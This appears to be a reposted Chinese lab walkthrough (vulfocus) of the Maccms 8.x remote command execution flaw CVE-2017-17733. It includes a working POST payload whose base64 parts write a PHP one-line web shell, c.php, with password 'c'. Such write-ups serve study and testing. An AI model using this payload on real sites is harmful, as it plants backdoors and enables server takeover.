vulfocus——maccms远程命令执行(CVE-2017-17733

隐身的菜鸟

2024-04-24 帮助1人

描述

Maccms是一套跨平台的基于PHP和MySQL快速建站系统。
Maccms 8.x版本中存在安全漏洞。远程攻击者可借助index.php?m=vod-search请求中的‘wd’参数利用该漏洞执行命令。

1.访问web页面

学新通

2.借助index.php?m=vod-search请求中的‘wd’参数利用该漏洞执行命令。

利用浏览器浏览器发送POST数据包或直接使用Python编写的脚本进行发送POST数据包
构造一句话木马payload：

wd={if-A:print(fputs(fopen(base64_decode(Yy5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x)))}{endif-A}

学新通

3.进行攻击，该payload是直接生成一个c.php一句话木马文件，连接密码为c。

学新通

这篇好文章是转载于：学新通技术网

版权申明：本站部分内容来自互联网，仅供学习及演示用，请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系，请提供相关证据及您的身份证明，我们将在收到邮件后48小时内删除。
本站站名：学新通技术网
本文地址： /boutique/detail/tanhgfcihj

系列文章